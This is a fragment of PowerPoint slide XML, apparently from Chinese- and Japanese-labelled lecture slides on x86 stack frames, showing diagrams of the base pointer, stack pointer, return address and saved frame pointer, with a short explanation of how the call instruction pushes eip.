                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112090" y="1698092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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985621" y="4776695"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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8" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BE8C5B-BBF2-3647-B6BA-454AB0D6D353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3668889" y="5082498"/>
            <a:ext cx="2384437" cy="8925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9" name="テキスト ボックス 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4E3591-BE59-6840-AAC4-C5CECEF8119E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3668889" y="5091289"/>
            <a:ext cx="26089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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="F2267D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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00ACBBA-20C5-7145-96FA-C3E1785A5B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953650" y="5678311"/>
            <a:ext cx="1861270" cy="0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正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AFB770D-6359-3D4E-9253-2BFBD3697550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985620" y="4047893"/>
            <a:ext cx="1908267" cy="672998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Return</a:t>
            </a:r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Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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(0x080483f3)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B3B5C61-7E16-5A41-915F-2097797B6E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3799913" y="4191400"/>
            <a:ext cx="41777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HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>call:</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" dirty="0">
              <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(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把原先下一個指令存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stack)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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然後</a:t>
            </a:r>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jump </a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW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03B5167-F6E1-C041-9B9E-AEC1B78F6304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518781" y="4513528"/>
            <a:ext cx="2732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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x080483f3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>push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eip</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x080483db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEFA47C6-3513-1F40-8A64-55B2C226E200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2298113" y="4653065"/>
            <a:ext cx="1501800" cy="123630"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F339F3B-10FD-41FD-8A3B-30CD34EF869C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112104" y="4485946"/>
            <a:ext cx="1965915" cy="8925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16" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6378EF-E195-4EE2-AAB6-890E9E55D6EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9661866" y="4804083"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1B6FF04-2D42-4B66-8CA5-C56D003910B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10175011" y="4509535"/>
            <a:ext cx="19659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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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5" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE74920-483D-4904-BB92-26A368600A9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="1011359"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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B8E4D144-E3EB-4E13-AB93-461B2E82B918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1156940"/>
            <a:ext cx="680313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直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1423952" y="1115122"/>
            <a:ext cx="1389050" cy="1355852"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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1227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252FD967-70E4-40C3-87FC-69ED237BA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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900272" y="1759457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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112090" y="1698092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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985621" y="4776695"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985620" y="4288501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Return</a:t>
            </a:r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Address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15" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4035552" y="2584704"/>
            <a:ext cx="3950068" cy="1414272"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3668889" y="5082498"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3727242" y="5096285"/>
            <a:ext cx="22264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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953650" y="5678311"/>
            <a:ext cx="1861270" cy="0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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708577" y="4161022"/>
            <a:ext cx="2411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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>位子</a:t>
            </a:r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zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>以便返回</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C438D20F-6C61-FA4E-9C5F-C8B6E3B326FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985619" y="3800307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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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3" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B172059-D0CB-4B09-8D2A-10A2C0D37A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112104" y="4485946"/>
            <a:ext cx="2384437" cy="916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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A5D8A0-6137-445D-8233-C871B20C3970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9661866" y="4804083"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E630BD82-D61C-42E9-A439-F02BE3FCB634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10175011" y="4509535"/>
            <a:ext cx="21980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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D1307E-B070-4F5C-851E-0D467F74C925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="2498139"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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5E05991D-5CB4-4C76-A1E1-EFEEF72EBFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2643720"/>
            <a:ext cx="680313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3422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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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15" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401312" y="2816352"/>
            <a:ext cx="3167800" cy="1024128"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601067" y="4418375"/>
            <a:ext cx="2194549" cy="92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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
